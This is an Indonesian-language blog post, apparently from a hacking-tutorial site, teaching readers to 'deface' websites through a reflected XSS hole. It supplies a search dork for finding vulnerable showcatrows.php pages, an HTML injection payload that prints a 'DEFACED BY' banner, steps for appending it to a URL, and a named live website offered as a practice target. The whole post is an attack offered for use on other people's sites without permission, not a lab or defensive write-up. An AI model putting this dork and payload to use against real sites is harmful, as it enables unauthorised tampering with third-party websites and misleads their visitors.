loading...

DEFACE POC XSS VULNERANILITY

    Yosh bertemu lagi dengan w Anonimokerl :v pada kesempatan sekarang w mau share deface poc XSS Vulnerability.
Sebelumnya kita siapkan dulu bahan-bahannya :v
Bahan :
-Dork
 inurl:"/showcatrows.php?CategoryID=
(Kembangin lagi :v)
-exploit
"><marquee><h1>DEFACED BY Anonimokerl ( G HAXOR TEAM )</h1></marquee>
Nick ama teamnya bisa lu ubah :v
Okey langsung saja ke langkah-langkahnya :v
Pertama lu cari target menggunakan dork yang di atas
Kedua, pilih salah satu web di atas sebagai target lu. Kalo vuln akan muncul seperti ini.
setelah menemukan target tambahkan Explotnya dibelakang pathnya :v
Ini web target saya awal nya  :
 http://download-by-zet.de/showcatrows.php?CategoryID=2
Lalu tambahkan exploitnya :
http://download-by-zet.de/showcatrows.php?CategoryID=2"><marquee><h1>DEFACED BY Anonimokerl ( G HAXOR TEAM )</h1></marquee>
tekan enter deh :v
Taraaa sekarang sitenya terdapat nick lu, seperti gambar dibawah ini
Untuk praktiknya w kasih life target
http://download-by-zet.de/showcatrows.php?CategoryID=2
THANKS
SEMOGA BERMANFAAT :V
MOHON MAAF BILA BANYAK KESALAHAN
KALO ADA YANG KURANG NGERTI BISA COMMENT SAJA DIBAWAH :V
OKEY :)
Tag : hacking, Tutorial
0 Komentar untuk "DEFACE POC XSS VULNERANILITY"

Back To Top